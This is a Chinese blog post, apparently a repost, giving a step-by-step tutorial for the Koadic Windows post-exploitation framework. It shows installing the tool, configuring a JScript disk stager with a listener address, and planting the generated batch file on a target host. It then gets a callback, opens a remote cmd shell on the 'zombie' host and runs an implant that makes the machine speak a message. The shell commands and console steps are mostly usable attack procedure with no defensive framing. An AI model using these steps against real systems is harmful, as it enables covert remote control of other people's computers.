博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
windows提权辅助工具koadic
阅读量:2259 次
发布时间:2019-05-09

本文共 892 字,大约阅读时间需要 2 分钟。

项目地址:https://github.com/zerosum0x0/koadic

┌─[root@sch01ar]─[/sch01ar]└──╼ #git clone https://github.com/zerosum0x0/koadic

 下载后打开并安装所需的包

┌─[root@sch01ar]─[/sch01ar/koadic]└──╼ #pip install -r requirements.txt

 安装完成后启动程序

┌─[root@sch01ar]─[/sch01ar/koadic]└──╼ #./koadic

 

输入use和空格然后连按两下Tab键查看模块

stager开头的模块是用来反弹主机的,implant开头的模块是用来对反弹的主机进行操作

选择stager/js/disk进行测试

(koadic: sta/js/mshta)# use stager/js/disk

 

查看配置信息

(koadic: sta/js/disk)# info

 

设置lhost

(koadic: sta/js/disk)# set LHOST 192.168.220.132

 

然后run

(koadic: sta/js/disk)# run

 

然后把[>]后的东西写到一个bat文件里,放到目标主机打开

注:stager开头的模块都是一样的操作

得到目标主机的反弹

查看僵尸主机列表

(koadic: sta/js/disk)# zombies

 

注:此目标主机的ID为0

执行cmd命令,0为主机的ID

(koadic: sta/js/disk)# cmdshell 0
[koadic: ZOMBIE 0 (192.168.220.129) - cmd.exe]> whoami

 

该上implant模块了

(koadic: sta/js/disk)# use implant/fun/voice

 

这个MESSAGE随便你设置,然后run

将会在目标主机朗读MESSAGE的内容

转载于:https://www.cnblogs.com/sch01ar/p/7857531.html

你可能感兴趣的文章
如何使整个页面内容居中
查看>>
c#写windows 服务
查看>>
C#编码 .
查看>>
谷歌搜索引擎
查看>>
正则表达式取正文中的汉字
查看>>
sql server 链接服务器的问题?
查看>>
提高SQL SERVER并发能力
查看>>
开始→运行→命令 集锦!
查看>>
使用C#的HttpWebRequest模拟登陆访问人人网
查看>>
免费网页抓包工具,火狐插件FireBug的抓包使用教程
查看>>
让apache产生cookie并记录到日志
查看>>
实现了新浪、腾讯、网易、搜狐四大微博的统一OAuth认证、调用接口。
查看>>
使用C#的HttpWebRequest模拟登陆访问人人网
查看>>
POST、GET的测试代码
查看>>
ASP.NET缓存的方法和最佳实践
查看>>
HttpContext.Current.Cache 提示:未将对象引用设置到对象的实例
查看>>
使用c#实现简单的路由器重启功能
查看>>
GridView数据绑定+存储过程调用
查看>>
正则表达式取HTTP链接
查看>>
如何通过使用 SQL Server 中的 Detach 和 Attach 函数将 SQL Server 数据库和日志文件移到新位置
查看>>